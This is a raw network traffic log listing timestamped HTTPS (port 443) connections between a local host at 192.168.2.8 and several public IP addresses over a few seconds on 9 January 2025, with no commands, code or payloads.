Jan 9, 2025 14:42:35.383776903 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.389226913 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.391139030 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.391339064 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.391438007 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.391797066 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.391829967 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.395469904 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.395503044 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.464696884 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.638580084 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.638608932 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.638746023 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.638752937 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.641665936 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.642354012 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.642363071 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.647953033 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.648492098 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.648499012 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.654151917 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.654764891 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.654771090 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.660406113 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.660507917 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.660515070 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.666773081 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.666945934 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.666954041 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.673096895 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.673564911 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.673572063 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.679222107 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.679337025 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.679343939 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.725097895 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.725188971 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.725199938 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.728055000 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.728173971 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.728180885 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.734370947 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.734668016 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.734673977 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.740735054 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.740855932 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.740861893 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.741686106 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.741703033 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.741765022 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.741894007 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.741908073 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.742093086 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742144108 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742182970 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.742300987 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742641926 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742669106 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.742713928 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742722988 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.742724895 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742791891 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742978096 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.742985964 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.743201971 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.743211985 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.743267059 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.743319988 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.743331909 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.743436098 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.743454933 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.743998051 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.744010925 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.744108915 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.744108915 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.744128942 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.744142056 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.747257948 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.747370005 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.747378111 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.753232002 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.753278971 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.753285885 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.759550095 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.759790897 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.759798050 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.765958071 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.766422033 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.766439915 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.772228003 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.772361040 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.772368908 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.778026104 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.778122902 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.778131008 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.783525944 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.783809900 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.783821106 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.788945913 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.789125919 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.789144993 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.794457912 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.794784069 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.794802904 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.799926043 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.800029039 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.800036907 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.805589914 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.806638002 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.806658030 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.810816050 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.810900927 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.810914040 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.816345930 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.816456079 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.816462994 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.820338964 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.820650101 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.820657015 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.824129105 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.824481964 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.824491978 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.828170061 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.828316927 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.828325987 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.831463099 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.831536055 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.831542969 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.834871054 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.835026026 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.835035086 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.838418007 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.838520050 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.838526964 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.841888905 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.841968060 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.841978073 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.845506907 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.845587015 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.845594883 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.848898888 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.849206924 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.849224091 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.852485895 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.852663040 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.852679968 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.855994940 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.856316090 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.856323004 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.859664917 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.859925985 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.859935045 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.863226891 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.863339901 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.863347054 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.866424084 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.866585970 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.866605043 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.869867086 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.869968891 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.869985104 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.873449087 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.873508930 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.873523951 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.876995087 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.877154112 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.877168894 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.880770922 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.881618023 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.881625891 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.883852959 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.884085894 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.884094000 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.887190104 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.887290955 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.887299061 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.890475035 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.890599966 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.890607119 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.893843889 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.893963099 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.893969059 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.896924019 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.896950006 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.897022009 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.897027969 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.897108078 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.900060892 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.903080940 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.903170109 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.903177023 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.906025887 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.906065941 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.906088114 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.906096935 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.906224966 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.909260988 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.911212921 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.911246061 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.911287069 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.911309958 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.911515951 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.913357019 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.915477991 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.915513992 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.915539980 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.915555954 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.915688992 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.917309046 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.917756081 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.917865992 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.917957067 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.917970896 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:36.196707964 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.197257996 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.197274923 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.198421955 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.198498964 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.199177980 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.199269056 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.199403048 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.199671984 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.199872017 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.199899912 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.199987888 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.200001001 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.200417042 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.200622082 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.200952053 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.200958967 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.201029062 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.201054096 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.201252937 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.201286077 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.202943087 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.203028917 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.203290939 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.203382969 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.203382969 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.203471899 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.207858086 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.208393097 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.208406925 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.209431887 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.210047960 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.210047960 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.210125923 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.229532003 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.229887962 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.229907990 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.230252981 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.230573893 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.230637074 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.305943966 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.305954933 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.305969954 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.305969954 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.305984974 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.368444920 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.368462086 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.368504047 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.369415998 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.369437933 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.385190964 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.385232925 CET	443	49765	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.385302067 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.385572910 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.385586023 CET	443	49765	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.477824926 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.478118896 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.509249926 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.509248972 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.579555988 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.579857111 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.579916954 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.579927921 CET	443	49756	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.579978943 CET	443	49755	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.579986095 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.579986095 CET	49756	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.579997063 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580037117 CET	49755	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580075026 CET	443	49757	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.580082893 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580104113 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580131054 CET	49757	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580159903 CET	443	49759	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.580198050 CET	443	49754	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.580240011 CET	49759	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580259085 CET	49754	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580313921 CET	443	49758	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.580374956 CET	49758	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.580558062 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:36.580624104 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:36.580739975 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:36.580887079 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:36.580928087 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:36.580971003 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:36.623336077 CET	443	49765	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639170885 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639194012 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.639275074 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639477968 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639507055 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.639576912 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639731884 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639746904 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.640211105 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.640224934 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.837935925 CET	443	49765	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.838043928 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.838053942 CET	443	49765	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.838124037 CET	49765	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.092102051 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.092386961 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.092400074 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.092691898 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.093710899 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.093787909 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.093867064 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.120565891 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.120835066 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.120846033 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.121181965 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.121953964 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.122020006 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.135334015 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.196958065 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.197143078 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.219079018 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.219249964 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.219372988 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.219976902 CET	49770	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.219988108 CET	443	49770	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.740454912 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:37.740469933 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:37.740498066 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:37.740514040 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:37.740573883 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:37.740698099 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:37.742398024 CET	49776	443	192.168.2.8	20.110.205.119
